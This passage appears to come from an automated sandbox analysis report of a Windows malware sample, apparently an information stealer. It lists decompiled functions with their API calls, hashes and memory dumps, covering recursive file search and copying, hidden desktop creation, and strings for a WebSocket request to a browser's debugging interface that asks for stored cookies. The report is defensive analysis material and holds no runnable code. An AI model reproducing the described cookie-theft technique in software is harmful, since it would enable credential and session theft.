                                    • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 1346933759-0
                                    • Opcode ID: f2f2574c6084eec1b331e9b8da9be98d8f117cfa2154264d67659848109d4a61
                                    • Instruction ID: 69f19fc76597078acf1692319da48b721a7eefc05a287b3e4de1fa27a67d03c6
                                    • Opcode Fuzzy Hash: f2f2574c6084eec1b331e9b8da9be98d8f117cfa2154264d67659848109d4a61
                                    • Instruction Fuzzy Hash: 7B121871601706ABDB24EFB8D899A6B7BB8FF44340F044A2DB895D7390DB34D815CB92
                                    Function 008DCCE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 008DCCFC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 008DCD13
                                    • lstrcat.KERNEL32(?,?), ref: 008DCD5F
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008DCD71
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008DCD8B
                                    • wsprintfA.USER32 ref: 008DCDB0
                                    • PathMatchSpecA.SHLWAPI(?,00538F68), ref: 008DCDE2
                                    • CoInitialize.OLE32(00000000), ref: 008DCDEE
                                      • Part of subcall function 008DCBE0: CoCreateInstance.COMBASE(008EB140,00000000,00000001,008EB130,?), ref: 008DCC06
                                      • Part of subcall function 008DCBE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 008DCC46
                                      • Part of subcall function 008DCBE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 008DCCC9
                                    • CoUninitialize.COMBASE ref: 008DCE09
                                    • lstrcat.KERNEL32(?,?), ref: 008DCE2E
                                    • lstrlen.KERNEL32(?), ref: 008DCE3B
                                    • StrCmpCA.SHLWAPI(?,008ED014), ref: 008DCE55
                                    • wsprintfA.USER32 ref: 008DCE7D
                                    • wsprintfA.USER32 ref: 008DCE9C
                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 008DCEB0
                                    • wsprintfA.USER32 ref: 008DCED8
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008DCEF1
                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 008DCF10
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 008DCF28
                                    • CloseHandle.KERNEL32(00000000), ref: 008DCF33
                                    • CloseHandle.KERNEL32(00000000), ref: 008DCF3F
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008DCF54
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DCF94
                                    • FindNextFileA.KERNEL32(?,?), ref: 008DD08D
                                    • FindClose.KERNEL32(?), ref: 008DD09F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                    • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 3860919712-2388001722
                                    • Opcode ID: 732a33a4b29b8c64a76a150a34870b1f84f03a53543475984e60b2c1540e1486
                                    • Instruction ID: 21064f99d4d643679cd5eafd3a0aeb307439203a05e4f9755f43ae0da093a261
                                    • Opcode Fuzzy Hash: 732a33a4b29b8c64a76a150a34870b1f84f03a53543475984e60b2c1540e1486
                                    • Instruction Fuzzy Hash: 8CC13D71A00219AFDB50EFA4DC49EEE7779FF88300F004599F509E7290DE74AA85CB91
                                    Function 008DE330 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 213stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 008DE353
                                    • FindFirstFileA.KERNEL32(?,?), ref: 008DE369
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008DE388
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008DE3A0
                                    • wsprintfA.USER32 ref: 008DE3C7
                                    • StrCmpCA.SHLWAPI(?,008ED014), ref: 008DE3DC
                                    • wsprintfA.USER32 ref: 008DE3F8
                                      • Part of subcall function 008DEF30: lstrcpy.KERNEL32(00000000,?), ref: 008DEF62
                                    • wsprintfA.USER32 ref: 008DE416
                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 008DE42B
                                    • lstrcat.KERNEL32(?,0053E848), ref: 008DE460
                                    • lstrcat.KERNEL32(?,008F1D5C), ref: 008DE473
                                    • lstrcat.KERNEL32(?,?), ref: 008DE488
                                    • lstrcat.KERNEL32(?,008F1D5C), ref: 008DE49B
                                    • lstrcat.KERNEL32(?,?), ref: 008DE4B1
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008DE4C6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE4FF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE553
                                    • DeleteFileA.KERNEL32(?), ref: 008DE594
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1437
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1459
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C147B
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C14DF
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008DE5D9
                                    • FindClose.KERNEL32(00000000), ref: 008DE5E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                    • String ID: %s\%s$%s\*$HS
                                    • API String ID: 1375681507-1316326243
                                    • Opcode ID: 616dad2da04b20162aef9fb8ad2b02fa425d7307156d363a9f53242cc613c09e
                                    • Instruction ID: a600fbdcfa512318301882f57275fb614b5281788bc32a98bee37185004954f6
                                    • Opcode Fuzzy Hash: 616dad2da04b20162aef9fb8ad2b02fa425d7307156d363a9f53242cc613c09e
                                    • Instruction Fuzzy Hash: 0F814D715147459BCB20EBB4DC49EAB77B9FB88304F00891DB699C7291EE34D909CBA2
                                    Function 008DDE50 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 170stringfilememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008DDE68
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008DDE6F
                                    • wsprintfA.USER32 ref: 008DDE87
                                    • FindFirstFileA.KERNEL32(?,?), ref: 008DDEA0
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008DDEBE
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008DDED9
                                    • wsprintfA.USER32 ref: 008DDEF9
                                    • DeleteFileA.KERNEL32(?), ref: 008DDF4D
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008DDF14
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1437
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1459
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C147B
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C14DF
                                      • Part of subcall function 008DDAA0: memset.MSVCRT ref: 008DDAC1
                                      • Part of subcall function 008DDAA0: memset.MSVCRT ref: 008DDAD3
                                      • Part of subcall function 008DDAA0: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008DDAFB
                                      • Part of subcall function 008DDAA0: lstrcpy.KERNEL32(00000000,?), ref: 008DDB2E
                                      • Part of subcall function 008DDAA0: lstrcat.KERNEL32(?,00000000), ref: 008DDB3C
                                      • Part of subcall function 008DDAA0: lstrcat.KERNEL32(?,0053E4C0), ref: 008DDB56
                                      • Part of subcall function 008DDAA0: lstrcat.KERNEL32(?,?), ref: 008DDB6A
                                      • Part of subcall function 008DDAA0: lstrcat.KERNEL32(?,0053D0D0), ref: 008DDB7E
                                      • Part of subcall function 008DDAA0: lstrcpy.KERNEL32(00000000,?), ref: 008DDBAE
                                      • Part of subcall function 008DDAA0: GetFileAttributesA.KERNEL32(00000000), ref: 008DDBB5
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008DDF5C
                                    • FindClose.KERNEL32(00000000), ref: 008DDF6B
                                    • lstrcat.KERNEL32(?,0053E848), ref: 008DDF92
                                    • lstrcat.KERNEL32(?,0053DA10), ref: 008DDFA4
                                    • lstrlen.KERNEL32(?), ref: 008DDFAF
                                    • lstrlen.KERNEL32(?), ref: 008DDFBE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DDFF4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                    • String ID: %s\%s$%s\*$HS
                                    • API String ID: 4184593125-1316326243
                                    • Opcode ID: c6cfc0adf89e73fd4242eb4fda6f20dcabd496ee52d5d377e6c1e463ee169a3e
                                    • Instruction ID: ae6183544ef74b0c09064cb315a56ca56fd545c158f5c94c00e8f11d67a87c6f
                                    • Opcode Fuzzy Hash: c6cfc0adf89e73fd4242eb4fda6f20dcabd496ee52d5d377e6c1e463ee169a3e
                                    • Instruction Fuzzy Hash: A35129715143449BC720EFB8D849EAB77A9FB88315F004A29F999C7290EF34D909CB92
                                    Function 008C15B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C15E2
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C1619
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C166C
                                    • lstrcat.KERNEL32(00000000), ref: 008C1676
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C16A2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C17F3
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C17FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat
                                    • String ID: \*.*
                                    • API String ID: 2276651480-1173974218
                                    • Opcode ID: 8ff2e86d76e4de72ddfbb3b9ac4c8f1dd8000f5f1f04586ef6da73d7b29dcdd4
                                    • Instruction ID: d34f2b2a2e2582169dfe1eea97f6ae3283331cd27f6a46db7ece2d309ff017ad
                                    • Opcode Fuzzy Hash: 8ff2e86d76e4de72ddfbb3b9ac4c8f1dd8000f5f1f04586ef6da73d7b29dcdd4
                                    • Instruction Fuzzy Hash: 3181F87191161A9BCB11EFA8C989FAE7BB8FF45700F040128F905E7292DB34DD16CB92
                                    Function 008DD640 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 183stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 008DD65D
                                    • FindFirstFileA.KERNEL32(?,?), ref: 008DD674
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008DD694
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008DD6AE
                                    • lstrcat.KERNEL32(?,0053E848), ref: 008DD6F3
                                    • lstrcat.KERNEL32(?,0053E8F8), ref: 008DD707
                                    • lstrcat.KERNEL32(?,?), ref: 008DD71B
                                    • lstrcat.KERNEL32(?,?), ref: 008DD72C
                                    • lstrcat.KERNEL32(?,008F1D5C), ref: 008DD73E
                                    • lstrcat.KERNEL32(?,?), ref: 008DD752
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DD792
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DD7E2
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008DD847
                                    • FindClose.KERNEL32(00000000), ref: 008DD856
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                    • String ID: %s\%s$HS
                                    • API String ID: 50252434-1860949076
                                    • Opcode ID: e865c28428a4f471613a820eb3a672a557f56ba4b35604ce6086c36db246abf3
                                    • Instruction ID: 36726fe8acd62c7cb5a60e402f12ee1c75113029751791d8225726286dcabcfe
                                    • Opcode Fuzzy Hash: e865c28428a4f471613a820eb3a672a557f56ba4b35604ce6086c36db246abf3
                                    • Instruction Fuzzy Hash: A9612175910219ABCB10EBB4CC88AEE7BB9FF48300F0085A9E649D7251DB34EA55CF90
                                    Function 008C9876 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 175stringsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateDesktopA.USER32(?), ref: 008C9888
                                    • lstrcat.KERNEL32(?,?), ref: 008C98BB
                                    • lstrcat.KERNEL32(?,?), ref: 008C98CD
                                    • lstrcat.KERNEL32(?,008F5128), ref: 008C98DD
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008C991A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C9950
                                    • StrStrA.SHLWAPI(?,0053DF98), ref: 008C9965
                                    • lstrcpyn.KERNEL32(00AF93D0,?,00000000), ref: 008C9982
                                    • lstrlen.KERNEL32(?), ref: 008C9996
                                    • wsprintfA.USER32 ref: 008C99A6
                                    • lstrcpy.KERNEL32(?,?), ref: 008C99BD
                                    • Sleep.KERNEL32(00001388), ref: 008C9A41
                                    • CloseDesktop.USER32(?), ref: 008C9A81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Desktoplstrcpy$CloseCreateFolderPathSleeplstrcpynlstrlenwsprintf
                                    • String ID: %s%s$D
                                    • API String ID: 649207557-433275411
                                    • Opcode ID: 51e3cf304756a5ec2949b357fd558c369c2942d007cac92342d40e1930d0135d
                                    • Instruction ID: 09cfacdc24db230dc24393d991bed3ffe5b772e21675138ac54c116cf2e6e010
                                    • Opcode Fuzzy Hash: 51e3cf304756a5ec2949b357fd558c369c2942d007cac92342d40e1930d0135d
                                    • Instruction Fuzzy Hash: 72612F71114344AFE720DBB8DC45FAB77A8FF84700F10451DB689CB291DA74D909CB96
                                    Function 008E48D0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_
                                    • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                    • API String ID: 909987262-758292691
                                    • Opcode ID: 5173fcc930eb97782432e505515c85720d70ac4a22c2d16822c8f9ad384a5df5
                                    • Instruction ID: a1146bebc8febe9d91a4f1b1319a82bdd7416a0d026c330f2c4a673f9072dec6
                                    • Opcode Fuzzy Hash: 5173fcc930eb97782432e505515c85720d70ac4a22c2d16822c8f9ad384a5df5
                                    • Instruction Fuzzy Hash: 95A24671D012A99FDB20DBA9C8807EDBBB6FF49304F1481AAD508E7241DB749E85CF91
                                    Function 008D2749 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D2774
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2797
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D27A2
                                    • lstrlen.KERNEL32(\*.*), ref: 008D27AD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D27CA
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 008D27D6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D280A
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 008D2826
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
